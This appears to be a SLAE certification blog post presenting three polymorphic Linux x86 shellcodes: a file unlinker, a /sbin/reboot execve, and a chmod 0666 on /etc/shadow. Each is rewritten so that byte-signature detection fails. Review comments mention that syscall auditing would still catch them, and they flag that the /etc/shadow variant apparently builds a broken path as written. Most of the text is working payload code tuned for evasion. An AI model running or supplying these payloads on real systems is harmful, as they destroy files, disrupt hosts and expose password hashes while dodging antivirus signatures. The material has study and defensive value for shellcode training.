Source: SecurityTube
I recommend checking this article: Polymorphic Shellcode Engine Using Spectrum Analysis
;26 bytes
;Shellcode : linux/x86 File unlinker 18 bytes + file path length
; Syntax: NASM (Intel operand order), 32-bit Linux, int 0x80 syscall gate
;         (eax = syscall number, ebx = first argument).
; Summary: the jmp/call/pop sequence recovers the address of the `file`
;         bytes into ebx, then two syscalls are issued: al = 0xa (the
;         "unlinker" call named in the header) and al = 1 with ebx = 0.
; What the [NEW] lines change: the single-instruction load of the syscall
;         number is replaced by arithmetic producing the same value. The
;         encoded bytes differ from the original, the syscalls made at run
;         time do not. A byte-pattern signature for the original encoding
;         will not match; syscall-level monitoring (e.g. auditing unlink on
;         paths of interest) sees the same behaviour in both variants.
global _start
section .text
_start:
; Jump forward so that the call at `one` can push the address of `file`.
jmp one
; Label written without a trailing colon; it is the target of `call two`.
two
; ebx = return address pushed by `call two`, i.e. the address of `file`.
pop ebx
;mov al, 0xa ;[ORIGIN]
; 0x7 + 0x5 - 0x2 = 0xa, the value the original loaded directly.
; NOTE(review): only al is written here; the upper bits of eax keep whatever
; value they had on entry -- presumably assumed zero, not established here.
mov al, 0x7 ;[NEW]
add al, 0x5 ;[NEW]
sub al, 0x2 ;[NEW]
int 0x80
; Second syscall: al = 1 with ebx cleared (exit with status 0).
mov al, 01
xor ebx, ebx
int 0x80
one:
; Pushes the address of the next byte (`file`) and transfers to `two`.
call two
; Placeholder bytes standing in for the path; the data sits directly after
; the call so that its address is the call's return address.
file: db 0xaa, 0xbb, 0xcc, 0xdd; <- your file here
Original here
;46 bytes
;Shellcode Linux x86 PUSH reboot()
; Syntax: NASM (Intel operand order), 32-bit Linux, int 0x80 syscall gate
;         (eax = syscall number, ebx/ecx/edx = arguments 1-3).
; Summary: builds the string "/sbin/reboot" on the stack, builds a
;         one-entry argument array pointing at it, and issues syscall 11
;         (NR_execve per the comment on the final add).
; What the [NEW] lines change: the dword holding "boot" and the syscall
;         number are each produced by arithmetic instead of appearing as a
;         literal immediate, so a signature keyed on those literal bytes
;         will not match. The execve of /sbin/reboot itself is unchanged and
;         is what process-execution logging would record.
global _start
section .text
_start:
; eax = 0; pushed next as the string terminator and reused below as NULL.
xor eax, eax
push eax
;push 0x746f6f62; toob [ORIGINAL]
; esi = 0x746f6c59, then the low word gets 0x6c59 + 0x309 = 0x6f62,
; giving 0x746f6f62 ("boot" in memory order) without that literal appearing.
mov esi, 0x746f6c59 ; [NEW]
add si, 0x309 ; [NEW]
; Store below the stack pointer, then move esp down over it: together these
; two instructions have the same effect on the stack as `push esi`.
mov dword [esp-4], esi; [NEW]
sub esp, 4 ; [NEW]
push 0x65722f6e ; er/n [ORIGINAL]
push 0x6962732f; ibs/[ORIGINAL]
; ebx = pointer to "/sbin/reboot" (first argument: path).
mov ebx, esp
push eax; 0
; edx = pointer to the zero dword just pushed (third argument).
mov edx, esp
push ebx
; ecx = pointer to { path pointer, 0 } (second argument: argument array).
mov ecx, esp
; NOTE(review): this line is tagged [ORIGINAL] but is not commented out, so
; it is still assembled; the two [NEW] lines below then set al to the same value.
mov al, 0xb; [ORIGINAL]
mov al, 0x6; [NEW]
add al, 0x5; [NEW] 11 = NR_execve
int 0x80
Original here
;Linux/x86 - chmod() 666 /etc/shadow & exit()
;39 bytes shellcode
; Syntax: NASM (Intel operand order), 32-bit Linux, int 0x80 syscall gate
;         (eax = syscall number, ebx = argument 1, ecx = argument 2).
; Summary: places path bytes on the stack, loads 0x1b6 into cx as the mode,
;         issues syscall 15 (chmod per the inline comment), then increments
;         eax and issues a second syscall (exit per the inline comment).
; What the [NEW] lines change: the dword holding "adow" is produced by
;         arithmetic instead of appearing as a literal immediate, so a
;         signature keyed on that literal will not match. A permission
;         change on /etc/shadow is the run-time behaviour that file-integrity
;         or syscall auditing would observe, independent of the encoding.
global _start
section .text
_start:
; Pushes the entry value of ecx; it sits directly after the path bytes on the
; stack. NOTE(review): presumably assumed to be zero -- not established here.
push ecx
; 0x1b6 = 438 decimal = 0666 octal. Only the low 16 bits of ecx are written.
mov cx, 0x1b6; = 438
;push 0x776f6461; woda [ORIGINAL]
; esi = 0x776f6158, then the low word gets 0x6158 + 0x309 = 0x6461,
; giving 0x776f6461 ("adow" in memory order).
mov esi, 0x776f6158; [NEW]
add si, 0x309 ; woda [NEW]
; NOTE(review): esp is not moved after this store, so the push on the next
; line writes its dword to the same address [esp-4]. As written, the bytes at
; ebx are "//etc/sh" followed by the pushed ecx value rather than the full
; path named in the header -- confirm against the linked original.
mov dword [esp-4], esi;[NEW]
push 0x68732f63; hs/c
push 0x74652f2f; te//
mov ebx, esp ;save pointer
push 0xf ;chmod
pop eax ;15
int 0x80
; eax holds the return value of the previous syscall; the increment yields 1
; only if that value was 0.
inc eax ;exit
int 0x80
Original here
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: